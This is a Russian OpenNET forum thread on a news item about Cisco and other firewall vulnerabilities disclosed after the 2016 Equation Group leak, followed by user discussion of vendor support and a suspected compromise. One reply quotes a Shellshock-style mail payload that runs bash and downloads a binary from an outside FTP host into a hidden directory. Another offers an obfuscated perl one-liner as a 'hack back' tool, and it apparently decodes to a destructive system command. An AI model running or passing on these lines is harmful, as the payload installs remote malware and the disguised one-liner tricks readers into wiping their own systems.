The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Серия уязвимостей в продуктах Cisco, выявленных после публик..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от opennews (??), 22-Авг-16, 10:57 
Хакерская группа "Equation Group" опубликовала (http://xorcat.net/2016/08/16/equationgroup-tool-leak-extraba.../) архив, содержащий (https://musalbas.com/2016/08/16/equation-group-firewall-oper...) около 250 Мб файлов с различными эксплоитами и приложениями для совершения атак, по заявлению группы полученной в результате утечки информации из Агентства Национальной Безопасности США (АНБ). В основном эксплоиты направлены на создание закладок и совершение атак на оборудование Cisco PIX/ASA (https://blogs.cisco.com/security/shadow-brokers), Juniper Netscreen (http://forums.juniper.net/t5/Security-Incident-Response/Shad...) и Fortigate (http://fortiguard.com/advisory/FG-IR-16-023), как правило используя zero-day уязвиомости.


Несмотря на то, что эксплоиты в основном касаются устаревшего и выведенного из эксплуатации оборудования, некоторые проблемы оказались актуальными (https://blogs.cisco.com/security/shadow-brokers) и в настоящее время. В частности, по мотивам обнародованной информации компания Cisco устранила в своих продуктах несколько уязвимостей (https://tools.cisco.com/security/center/publicationListing.x...), позволяющих удалённо выполнить код на оборудовании  Cisco. В том числе устранена критическая уязвимость (http://tools.cisco.com/security/center/content/CiscoSecurity...) (CVE-2016-1457), позволяющая получить доступ к интерфейсу Cisco Firepower Management Center и Cisco ASA 5500-X с сервисами FirePOWER с правами root без прохождения аутентификации через отправку специально оформленного HTTP-запроса. Другая проблема (https://tools.cisco.com/security/center/content/CiscoSecurit...) (CVE-2016-6366) в Cisco ASA, Cisco PIX и Cisco Firepower  позволяет без авторизации выполнить код через отправку запроса по SNMP.


Что касается межсетевых экранов Cisco PIX, поддержка которых была прекращена в 2009 году, но которые по-прежнему применяются (https://www.shodan.io/search?query=cisco+4608) некоторыми отечественными провайдерами, в составе архива присутствовала (https://musalbas.com/2016/08/18/equation-group-benigncertain...) утилита benigncertain, позволяющая удалённо извлечь закрытый ключ для произвольного IPsec-соединения. Суть атаки сводится к эксплуатации уязвимости, позволяющей через отправку специально оформленного IKE-пакета инициировать выход за границы буфера и в составе ответа получить часть системной памяти, в том числе содержащей закрытые RSA-ключи и конфеденциальные настройки. Указанная уязвимость проясняет методы, используемые для проведения атак АНБ на VPN, упомянутые (https://www.opennet.ru/opennews/art.shtml?num=41356) в документах (https://www.opennet.ru/opennews/art.shtml?num=37846), несколько лет назад опубликованных Эдвардом Снойденом. По оценке компании Cisco, уязвимость присутствует только в версиях Cisco PIX до выпуска 7.0.


URL: http://arstechnica.com/security/2016/08/cisco-confirms-nsa-l.../
Новость: https://www.opennet.ru/opennews/art.shtml?num=45013

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +20 +/
Сообщение от Аноним (-), 22-Авг-16, 10:57 
cisco , juniper , fortigate, brocade ,extreme , все они сами создали эти дырки а теперь говорят клиентам , давай плати еще service что бы пофиксили, офигенный бизнес.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –14 +/
Сообщение от Аноним (-), 22-Авг-16, 11:12 
не стесняйтесь. Добавте в список RedHat, SuSe, Ubuntu, MariaDB.
все они наделали дырок, а теперь хотят денег за поддержку и исправление ошибок.

Почему вы их не упомянули?

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

4. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +13 +/
Сообщение от evkogan (?), 22-Авг-16, 11:19 
> Почему вы их не упомянули?

Потому как ты можешь сам пофиксить пролему. Никто не мешает. А если тебе лень или умеия не хватает, то плати. Но возможность, то приутствует. И даже при закрытии фирмы производителя останется.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

7. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +2 +/
Сообщение от aurved (?), 22-Авг-16, 12:55 
да и платить не надо, ubuntu с mariadb денег не просят, а еще есть centos и opensuse
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

8. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Аноним (-), 22-Авг-16, 12:56 
Теоретически можно в снятой с поддержки циске пофиксить... а если тебе уменя не хватает, то не факт, что кто-то другой это сделает на нужном уровне.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

11. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +6 +/
Сообщение от Аноним (-), 22-Авг-16, 13:34 
Ага, а образ поправленной прошивки тебе Аллах подпишет, чтоб чип жадности не превратил циску в тыкву?
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

20. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –6 +/
Сообщение от Аноним (-), 22-Авг-16, 15:53 
> Ага, а образ поправленной прошивки тебе Аллах подпишет, чтоб чип жадности не
> превратил циску в тыкву?

Ну если ты не знаешь как сделать это, не значит что за твои деньги не сделает кто-то другой.
Так мы же не твою жадность сейчас обсуждаем?

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

28. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +5 +/
Сообщение от Аноним (-), 22-Авг-16, 17:11 
Ага, это зделает Васян с Бутово, аффтар твоего zvercd.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

36. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от IB (?), 22-Авг-16, 19:23 
Неверно поставлен вопрос.
За перепрошивку таки можно и присесть при неблагоприятных обстоятельствах.
Заколебаешься fair-use доказвать и не дай бог кто-то увидел твою ломаную прошивку.
DMCA он такой
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

15. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от Del (?), 22-Авг-16, 14:04 
>> Почему вы их не упомянули?
> Потому как ты можешь сам пофиксить пролему. Никто не мешает. А если
> тебе лень или умеия не хватает, то плати. Но возможность, то
> приутствует. И даже при закрытии фирмы производителя останется.

Ага, закрытые дрова тоже фиксить будете?

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

19. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –2 +/
Сообщение от Аноним (-), 22-Авг-16, 15:52 
За твои деньги легко. вон kPatch фиксит нужное в памяти.

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

27. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Аноним (-), 22-Авг-16, 17:07 
>> Ага, закрытые дрова тоже фиксить будете?
> За твои деньги легко. вон kPatch фиксит бузину в огороде!

fix. Не благодарите!


Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

3. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от evkogan (?), 22-Авг-16, 11:16 
Я не уверен, что все эти дырки созданы намеренно. И при наличии гарантии они закроют их и без дополнительных денег. Вообще отдавать новые прошивки только при купленной тех. поддержке это плохо. Но когда поставить обновления вообще нельзя, потому как производитель давно закрылся и даже если готов заплатить, то некому, это гораздо хуже. А железка меожет быть и не особо старой.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

6. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +3 +/
Сообщение от Аноним (-), 22-Авг-16, 12:52 
Уровень разработчиков в циске сейчас настолько низкий, что реально большинство дыр могут быть сделаны по глупости. Циска сейчас - это филиал индийской компании.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

26. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –3 +/
Сообщение от qwerty (??), 22-Авг-16, 17:07 
> Циска сейчас - это филиал индийской компании.

Это вам так хочется шоб было? =)

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

29. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +2 +/
Сообщение от Аноним (-), 22-Авг-16, 17:15 
Я другой аноним, но побывав там, всё подтверждаю. Циска почти полностью состоит из индусов. Преимущественно из Бангалора. Притом это, не только разрабы, но и админперсонал. В таких гнилых условиях только они работать и могут.
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

59. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Аноним (-), 24-Авг-16, 04:32 
Пепелацы все еще строят
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

37. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от Аноним (-), 22-Авг-16, 19:27 
Если не в курсе, то почти все новинки циски в последние годы - это тупо продукция только что целиком приобретённых компаний. Естественно после интеграции в циску со временем способности к разработке утрачиваются....
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

34. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от . (?), 22-Авг-16, 18:38 
> И при наличии гарантии они закроют их и без дополнительных денег.

у циски нет гарантии. (точнее, есть на low end офисное оборудование, и такая, что лучше б не было)
У циски есть только smartnet с TAC'ом, которому таки да, платят совершенно не за то (и на сравнительно современном железе ты без него далеко не уедешь - оно просто в один не очень отдаленный и совершенно непрекрасный день навернется без видимых причин, и ты так и будешь всю жизнь его перезагружать, даже не имея возможности понять, что именно вызывает проблему). То есть платят по умолчанию, а кроилово всегда вело к попадалову.

Проблем с ним две: во-первых, не удастся поставить под него уже не обслуживаемое и при этом не абсолютно исправное оборудование (можно попытаться обмануть, особенно если проблема софтовая, но если у тебя там трояны кишат, уже может не выйти ;-)

Вторая, и более главная - циска может выпускать патчи, ты их можешь даже посмотреть через дырочку в их веб-интерфейсе, но скачать тебе их не дадут. И задаром не дадут, и за деньги тоже. Потому что опа - твоему оборудованию пять лет назад вышел end of life. Получить на такое оборудование смартнет было можно - три года назад. Два года назад он кончился. А сегодня уже никак нельзя. Вот нету дырки для заноса денег.
Те же пиксы тому пример.

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

38. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от zanswer (?), 22-Авг-16, 19:31 
Гарантия у них стандартная, один год, обновление IOS можно получить бесплатно, в случае наличия в текущем ошибок связанных с безопасностью.

Использовать в 2016 году PIX, можно конечно, но нужно ли? В прочем, кого вы предлагаете взамен?

Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

48. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от . (?), 23-Авг-16, 12:26 
> Использовать в 2016 году PIX, можно конечно, но нужно ли?

ну да, надо его выкинуть, и заплатить чемодан денег за асу, чтобы она выполняла ровно те же действия в том же мелкоофисе, который ни расти не будет, ни чего-то внутри у себя менять еще лет десять (помножив на полсотни тех мелкоофисов, получаем тех чемоданов уже грузовичок). Причем без всякой гарантии, что именно той версии асы, за которую ты заплатил чемодан, не настанет прямо через месяц EOL, и при следующей серьезной проблеме не придется снова все менять.
Ну и результат налицо - мелкий и средний бизнес мигрирует на опенсорцные недоделки, крупный ставит не то что хорошо работает, а то что выиграло тендер, поскольку экспертиза ныне не в моде :-(
Результат один и тот же - уменьшение хорошей конкуренции, заполнение рынка кривым и убогим опенсорсным софтом, который нет стимулов доделывать, ибо все остальное либо еще хуже, либо безумно дорого.

Что до использования пиксов в 2016м году - напоминаю, тут речь о его использовании в качестве vpn-сервиса, ну и что у нас опенсорсного умеет совместимый с окружающими ipsec, с работающим автоматическим nat-t? А если чуть усложним задачу - спарка двух пиксов в active/passive failover? Да, оно такое могет, привет из 2002го года ;-)

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

49. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от zanswer (?), 23-Авг-16, 12:41 
Не понял, так что нужно выбрать взамен Cisco с их не последовательной политикой?
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

56. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Led (ok), 23-Авг-16, 22:58 
> Не понял, так что нужно выбрать взамен Cisco с их не последовательной
> политикой?
> не последовательной

Выбирай Розенталя

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

41. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Онаним (?), 23-Авг-16, 03:05 
А есть какие-то открытые альтернативы? Типа одноплатные компы с десятками Ethernet-интерфейсов на боту, на котрые можно поставить Linux/Фряху/итп. и нормально самому поддерживать (ну, не без помощи сообщества, разумеется), в т.ч. самому перекомпилировать ведро и всё такое?
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

42. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от zanswer (?), 23-Авг-16, 07:41 
И самое главное, с конкурентным BPS/PPS/CPS/MCC, иначе куда его ставить, весь такой открытый и не способный выполнять поставленную задачу.
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

47. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Andrey Mitrofanov (?), 23-Авг-16, 12:08 
> И самое главное, с конкурентным BPS/PPS/CPS/MCC, иначе куда его ставить, весь такой
> открытый и не способный выполнять поставленную задачу.

Альтернатива есть. И это Сискоу! Если верить интерпретации массовых увольнений жёлтой бузинес прессой:

Cisco Cuts Workforce by 7% to Speed Transition to Software

Ian King | Bloomberg

Cisco Systems Inc., the biggest maker of equipment that runs the internet, plans
to cut about 7 percent of its workforce, trying to recast itself as a provider
of software-based systems and services.

read more
< http://thevarguy.com/var-guy/cisco-cuts-workforce-7-speed-tr... >

Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

50. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от zanswer (?), 23-Авг-16, 12:43 
Не вижу где вы ссылку на OpenSource решение приложили, с Cisco то всё ясно.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

52. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Andrey Mitrofanov (?), 23-Авг-16, 13:18 
> Не вижу где вы ссылку на OpenSource решение

Её там и нет. Наверное, я неправильно прочитал вопрос, как "хочу, чтоб всё совсем как сискоу, но ещё и...". Виноват.  //OpenWRT не предлагаю, на их сайт не нашёл запрошенного Вами трёхбуквенного супа.

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

54. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от zanswer (?), 23-Авг-16, 14:02 
OpenWRT не делает железо насколько я знаю, может быть я ошибаюсь конечно. Речь идёт о том, чем заменить Cisco/Juniper/Fortigate и прочих, которые строят свои ОС сейчас, на базе Linux, чтобы замена выполняла поставленную задачу.

А то, что у Cisco и прочих проприетарных производителей, есть минусы, никто по-моему не сомневается, но замены то нет.

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

57. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от Led (ok), 23-Авг-16, 22:59 
> А то, что у Cisco и прочих проприетарных производителей, есть минусы, никто
> по-моему не сомневается, но замены то нет.

Ты ещё скажи, что тебе замены нет.

Ответить | Правка | ^ к родителю #54 | Наверх | Cообщить модератору

60. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от zanswer (?), 24-Авг-16, 06:26 
Не вижу ваших предложений, чем их заменить?
Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

45. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Слава (??), 23-Авг-16, 11:18 
Дайте угадаю,вы же не айтишник?
https://www.alibaba.com/showroom/mini--itx-motherboard-for-6...
да и промышленные 12-портовики есть
это так на вскидку,а можно еще карточек разных навешать от wifi до 4G
я эти конструкторы под задачи параноиков каждый божий день собираю
Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

51. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от zanswer (?), 23-Авг-16, 12:44 
И как оно в сравнение с чем-то материальным, что обычно ставят в стойки, с какой моделью Cisco ASA или Juniper SRX, можно сравнить это?


Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

53. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Слава (??), 23-Авг-16, 13:29 
Сравнивать глупо потому что разное назначение. Это же способ получить рабочий канал для локалки в любой жопе мира-есть lan будет по проводу гнать,есть wifi/adsl/4G/gprs будет по нему. После того как агрегирование сделали вообще всё хорошо стало. По программной части в целом самододел распространенных решений-нормально,учитывая незначительное число подключений. Да и использование openlinksys свой результат дает-по безопасности и качеству линка нареканий нет.
Спрос на железки стабильный:в основном телевизионщики и журналисты на передвижные аппаратки. Аналоги фирменные от 600 тысяч начинаются, мы в 4 раза дешевле гоним.
Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

55. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от zanswer (?), 23-Авг-16, 14:04 
Здорово! Интересное решение у вас в своём классе устройств, я просто не туда его всунул,  после вашего разъяснения, согласен, что мой вопрос не корректен.
Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

58. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Anonymous1 (?), 24-Авг-16, 01:16 
> А есть какие-то открытые альтернативы? Типа одноплатные компы с десятками Ethernet-интерфейсов
> на боту, на котрые можно поставить Linux/Фряху/итп. и нормально самому поддерживать
> (ну, не без помощи сообщества, разумеется), в т.ч. самому перекомпилировать ведро
> и всё такое?

А зачем? Возьмите комп, объедините со свитчем, умеющим VLAN, и имейте до 4096 сетевых интерфейсов (теоретически, разумеется). Правда, реально получится до 8 гигабитных интерфейсов при 10G сетевой плате, либо до 8 100-мб интерфейсов на гигабитной сетевой плате... Десятки гигабитных интерфейсов коммутировать без прямой работы через ASIC не получится в любом случае...

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

5. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +3 +/
Сообщение от Аноним (-), 22-Авг-16, 11:49 
к гадалке не ходи что и анб и циско знали об этих якобы уязвимостей
НО теперь об этом знают ВРАГИ поэтому придется закрыть
УХАХА
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от aurved (?), 22-Авг-16, 12:58 
Больше взломов АНБ, хороших и разных)))
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Аноним (-), 22-Авг-16, 13:08 
Я уверен, что даже в линуксе полно бэкдоров позволяющих залезть если надо
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Аноним (-), 22-Авг-16, 13:39 
Ага, просто там так много кода, что лень заморачиваться искать. :)
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

61. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от Аноним (-), 25-Авг-16, 01:10 
> Ага, просто там так много кода, что лень заморачиваться искать. :)

Стопудово.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

17. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Yuka (ok), 22-Авг-16, 14:24 
https://www.opennet.ru/opennews/art.shtml?num=37947
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

12. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Аноним (-), 22-Авг-16, 13:38 
SUSE Enterprise Desktop 11, пробный 60-дневный период, все обновления установлены. Произошла такая фигня. Нужно было отправить биткойны. Скачал клиент, как ни странно "strings bitcoin-qt | grep LIB" сообщил что системного GLIBC хватает. Сделал симлинк ~/.bitcoin на внешний хард. Включил, подождал полчаса пока снихронизируется, отправил, отключил.

После перезагрузки комп "обрадовал" меня тем, что не удалось отобразить кол-во неудачных логинов - файл "lastb" удалён. Круто. Кто-то увидел новый айпишник, подключающийся к сети биткойн, и ломанул 9возможно автоматически)? У меня хоть и белый IP, но Firewall включен, а SSH - напротив - нет.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

21. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +2 +/
Сообщение от PnDx (ok), 22-Авг-16, 16:23 
Чего-то в этой истории не хватает…
"Скачал клиент" https://bitcoin.org/ru/download
там нет rpm, насколько (не)вижу. Т.е., скачана чья-то левая сборка (вывод такой, раз "собрал" в тексте не фигурирует, а сразу "strings"). Дальше рассказывать?
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

24. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +2 +/
Сообщение от commiethebeastie (ok), 22-Авг-16, 16:33 
> Чего-то в этой истории не хватает…
> "Скачал клиент" https://bitcoin.org/ru/download
> там нет rpm, насколько (не)вижу. Т.е., скачана чья-то левая сборка (вывод такой,
> раз "собрал" в тексте не фигурирует, а сразу "strings"). Дальше рассказывать?

Это вшивый серверную с баней перепутал.

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

31. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от Аноним (-), 22-Авг-16, 17:36 
Это был официальный tar.xz, распакованный в /home/username. Почему ты считаешь, что RPM-ка оттуда же была бы безопаснее?
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

32. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от anonXYZ (?), 22-Авг-16, 17:54 
не неси чушь. ОФициальный blob bitcoin core в архиве ..tar.gz всегда идет.
sha1sum
d215d582aec707d2dc208b61d4442def8e08268b  bitcoin-0.12.1-linux32.tar.gz
156b897c6c7d1f12587d72ea92ccaf28dccedd55  bitcoin-0.12.1-linux64.tar.gz

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

33. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от PnDx (ok), 22-Авг-16, 18:15 
>  sha1sum
>  d215d582aec707d2dc208b61d4442def8e08268b  bitcoin-0.12.1-linux32.tar.gz
>  156b897c6c7d1f12587d72ea92ccaf28dccedd55  bitcoin-0.12.1-linux64.tar.gz

? Не поленился сходить на официалку, там подписанные sha256. Т.е. врукопашную качаем asc → проверяем подпись → качаем .tar.gz → проверяем сумму.
Наличие поддерживаемого репо сводит эти шаги к исходной проверке сигнатуры репозитория.
В описанном выше случае с высокой долей вероятности был применён виндо-подход "скачал-запустил", возможно даже из-под рута (т.к. логи "вдруг" не исчезают).

** Тут ко мне в "ловушку" прилетело по smtp:
To:() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;…
ну и т.д., в конце хамство с затиркой всего подряд.  Таки не понял, это что за почтовик шелл из-под рута дёргает? Судя по наличию робота, явление сравнительно массовое?

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

39. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от ram_scan (?), 22-Авг-16, 21:15 
С разморозкой ;) Этой дырище уже наверное второй год пошел...
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

35. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –2 +/
Сообщение от . (?), 22-Авг-16, 18:48 
> Чего-то в этой истории не хватает…
> "Скачал клиент" https://bitcoin.org/ru/download
> там нет rpm, насколько (не)вижу. Т.е., скачана чья-то левая сборка (вывод такой,

ну да, современные опенсорсные обезьянки как не видят rpm - сразу плачут, и бегут собирать из исходника.

> раз "собрал" в тексте не фигурирует, а сразу "strings"). Дальше рассказывать?

да, расскажите нам - что за нёх качается с https://bitcoin.org/bin/bitcoin-core-0.12.1/bitcoin-0.12.1-l... ? Нет, это ни разу не исходник. Который вы тоже ни разу не верифицировали, так что неизвестно, чем он лучше, если берется с того же сайта.

Ну а что товарищ использует стрингс вместо ldd, это да, печаль (но более безопасно ;-) , как и то что видимо правда работает от рута - вряд ли в актуальной и патченной sel можно нахаляву далеко уехать просто с метасплойтом (хотя, конечно, главное выбрать момент). А вот никакой защиты от дураков, типа принудительного отучения пользователей работать рутом и подсовывания им sudo, там действительно нет, это энтерпрайз дистрибутив, предполагается, что либо он стоит за периметром, либо им занимаются грамотные инженеры.

Интересно, его биткойновый кошелечек - тигидам, или можно еще успеть к дербану? ;-)

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

30. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +2 +/
Сообщение от Аноним (-), 22-Авг-16, 17:17 
> SUSE Enterprise Desktop 11, пробный 60-дневный период, все обновления установлены. Произошла
> такая фигня. Нужно было отправить биткойны. Скачал клиент, как ни странно
> "strings bitcoin-qt | grep LIB" сообщил что системного GLIBC хватает. Сделал
> симлинк ~/.bitcoin на внешний хард. Включил, подождал полчаса пока снихронизируется, отправил,
> отключил.
> После перезагрузки комп "обрадовал" меня тем, что не удалось отобразить кол-во неудачных
> логинов - файл "lastb" удалён. Круто. Кто-то увидел новый айпишник, подключающийся
> к сети биткойн, и ломанул 9возможно автоматически)
? У меня хоть и
> белый IP, но Firewall включен, а SSH - напротив - нет.

Хакни их в отместку!


echo "|-|/-\C|< |3/-\C|< |\|0\/\/!"|perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

43. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  –1 +/
Сообщение от odity (ok), 23-Авг-16, 08:42 
Зашибись. первый архив отекрыл, а за файлы они хотят деньги. ну засранцы. ну, буду первый мучать.изучать.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +/
Сообщение от John (??), 23-Авг-16, 09:03 
А сколько их там ещё....
Неудивительно для конторы, которая даже стандартов TCP/IP не знает
https://supportforums.cisco.com/discussion/10014991/icmp-hos...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

46. "Серия уязвимостей в продуктах Cisco, выявленных после публик..."  +1 +/
Сообщение от Andrey Mitrofanov (?), 23-Авг-16, 12:01 
>> Хакерская группа "Equation Group" [2016/08/16/equationgroup-tool-leak-extrabacon-demo/ опубликовала] архив, содержащий около 250 Мб файлов

Если чтение URL-а под словом "опубликовала" не навело автора новости на мысли, что этт не "она", гхрупп, а "её", гхруппу, по-публиковали, то... я приведу ещё упражнение в иностранном для наших Авторов:

Security News for the Week of August 15, 2016

Among the growing number of major organizations getting hacked these days, we can now add the National Security Agency (NSA) to the list. Well, sort of. This week, the NSA was reportedly targeted by a group of hackers who call themselves the Shadow Brokers. On Saturday, the “shady” crew released a series of files containing malware and attack code developed by the NSA-associated team, Equation Group. --http://thevarguy.com/network-security-and-data-protection-so...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру